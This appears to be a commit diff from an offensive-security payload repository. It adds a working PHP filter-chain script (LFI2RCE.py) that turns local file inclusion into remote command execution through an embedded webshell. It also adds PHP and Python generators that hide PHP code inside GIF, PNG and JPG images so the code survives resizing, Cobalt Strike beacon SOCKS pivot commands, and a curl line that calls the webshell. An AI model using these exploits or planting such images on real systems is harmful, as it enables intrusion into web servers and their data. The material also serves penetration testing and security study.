LFI2RCE - Picture Compression - SOCKS5 CS

2024-05-08 19:06:21 +02:00 · 2022-08-21 16:38:54 +02:00 · 2022-08-21 16:38:54 +02:00 · fbd7517e04
parent e7af5aeb84
commit fbd7517e04
13 changed files with 157 additions and 19 deletions
--- a/Inclusion/LFI2RCE.py
+++ b/Inclusion/LFI2RCE.py
@ -0,0 +1,60 @@
+import requests
+
+url = "http://localhost:8000/chall.php"
+file_to_use = "/etc/passwd"
+command = "id"
+
+#<?=`$_GET[0]`;;?>
+base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
+
+conversions = {
+    'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
+    'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
+    'C': 'convert.iconv.UTF8.CSISO2022KR',
+    '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
+    '9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
+    'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
+    's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
+    'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
+    'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
+    'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
+    'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
+    '0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
+    'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
+    'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
+    'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
+    'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
+    '7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
+    '4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
+}
+
+
+# generate some garbage base64
+filters = "convert.iconv.UTF8.CSISO2022KR|"
+filters += "convert.base64-encode|"
+# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
+filters += "convert.iconv.UTF8.UTF7|"
+
+
+for c in base64_payload[::-1]:
+        filters += conversions[c] + "|"
+        # decode and reencode to get rid of everything that isn't valid base64
+        filters += "convert.base64-decode|"
+        filters += "convert.base64-encode|"
+        # get rid of equal signs
+        filters += "convert.iconv.UTF8.UTF7|"
+
+filters += "convert.base64-decode"
+
+final_payload = f"php://filter/{filters}/resource={file_to_use}"
+
+with open('payload', 'w') as f:
+    f.write(final_payload)
+
+r = requests.get(url, params={
+    "0": command,
+    "action": "include",
+    "file": final_payload
+})
+
+print(r.text)
--- a/Inclusion/README.md
+++ b/Inclusion/README.md
--- a/Resources/Cobalt
+++ b/Resources/Cobalt
@ -337,6 +337,11 @@ Opsec safe Pass-the-Hash:
 ```powershell
 # Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage.
 beacon > socks [PORT]
+beacon > socks [port]
+beacon > socks [port] [socks4]
+beacon > socks [port] [socks5]
+beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password]
+beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] [enableLogging|disableLogging]

 # Proxy browser traffic through a specified Internet Explorer process.
 beacon > browserpivot [pid] [x86|x64]
--- a/Compression/GIF_exploit.gif
+++ b/Compression/GIF_exploit.gif
--- a/Compression/JPG_exploit-55.jpg
+++ b/Compression/JPG_exploit-55.jpg
--- a/Compression/PNG_110x110_resize_bypass_use_LFI.png
+++ b/Compression/PNG_110x110_resize_bypass_use_LFI.png
--- a/Compression/PNG_32x32_resize_bypass_use_LFI.png
+++ b/Compression/PNG_32x32_resize_bypass_use_LFI.png
--- a/Compression/createBulletproofJPG.py
+++ b/Compression/createBulletproofJPG.py
@ -1,7 +1,6 @@
 #!/usr/bin/python

 """
-
    Bulletproof Jpegs Generator
    Copyright (C) 2012  Damien "virtualabs" Cauquil

@ -18,7 +17,11 @@
    You should have received a copy of the GNU General Public License along
    with this program; if not, write to the Free Software Foundation, Inc.,
    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
-    
+
+	-------------
+	# How to use
+	b.php?c=ls
+	Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
 """
 from __future__ import print_function

--- a/Compression/createCompressedPNG_110x110.php
+++ b/Compression/createCompressedPNG_110x110.php
--- a/Compression/createGIFwithGlobalColorTable.php
+++ b/Compression/createGIFwithGlobalColorTable.php
@ -0,0 +1,22 @@
+<?php
+// createGIFwithGlobalColorTable.php
+$_file="example.gif";
+$_payload="<?php evil();?>";
+$_width=200;
+$_height=200;
+if(strlen($_payload)%3!=0){
+ echo "payload%3==0 !"; exit();
+}
+$im = imagecreate($_width, $_height);
+$_hex=unpack('H*',$_payload);
+
+$colors_hex=str_split($_hex[1], 6);
+
+for($i=0; $i < count($colors_hex); $i++){
+  $_color_chunks=str_split($colors_hex[$i], 2);
+  $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
+  imagesetpixel($im,$i,1,$color);
+}
+
+imagegif($im,$_file);
+?>
--- a/Compression/createPNGwithPLTE.php
+++ b/Compression/createPNGwithPLTE.php
@ -0,0 +1,28 @@
+<?php 
+//createPNGwithPLTE.php
+// bypass imageCreateFromPng and imagepng 
+$_payload="<?php phpinfo()?> ";
+$_pay_len=strlen($_payload);
+if(strlen($_payload)%3!=0){
+ echo "payload%3==0 !"; exit();
+}
+
+
+$width=$_pay_len/3;
+$height=20;
+//$im = imageCreateFromPng("existing.png");
+$im = imagecreate($width, $height);
+
+$_hex=unpack('H*',$_payload);
+$_chunks=str_split($_hex[1], 6);
+
+for($i=0; $i < count($_chunks); $i++){
+
+  $_color_chunks=str_split($_chunks[$i], 2);
+  $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
+
+  imagesetpixel($im,$i,1,$color);
+
+}
+
+imagepng($im,"example.png");
--- a/Resize/README.txt
+++ b/Resize/README.txt
@ -1,5 +0,0 @@
-# How to use
-b.php?c=ls
-
-
-Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
--- a/Files/README.md
+++ b/Files/README.md
@ -9,7 +9,7 @@
    * [Defaults extensions](#defaults-extensions)
    * [Upload tricks](#upload-tricks)
    * [Filename vulnerabilities](#filename-vulnerabilities)
-    * [Picture upload with LFI](#picture-upload-with-lfi)
+    * [Picture compression](#picture-compression-)
    * [Configuration Files](#configuration-files)
    * [CVE - Image Tragik](#cve---image-tragik)
    * [CVE - FFMpeg](#cve---ffmpeg)
@ -107,12 +107,16 @@ Also you upload:
 - HTML/SVG files to trigger an XSS
 - EICAR file to check the presence of an antivirus

-### Picture upload with LFI
+### Picture Compression

-Valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.
+Create valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.

 - Picture Metadata, hide the payload inside a comment tag in the metadata.
 - Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating `getimagesize()` and `imagecreatefromgif()`.
+    - [JPG](https://virtualabs.fr/Nasty-bulletproof-Jpegs-l): use createBulletproofJPG.py
+    - [PNG](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createPNGwithPLTE.php
+    - [GIF](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createGIFwithGlobalColorTable.php
+

 ### Picture with custom metadata

@ -198,4 +202,5 @@ Upload the XML file to `$JETTY_BASE/webapps/`
 * [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0)
 * [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
 * [Arbitrary File Upload Tricks In Java - pyn3rd](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/)
-* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload)
+* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload)
+* [Injection points in popular image formats - Daniel Kalinowski‌‌ - Nov 8, 2019](https://blog.isec.pl/injection-points-in-popular-image-formats/)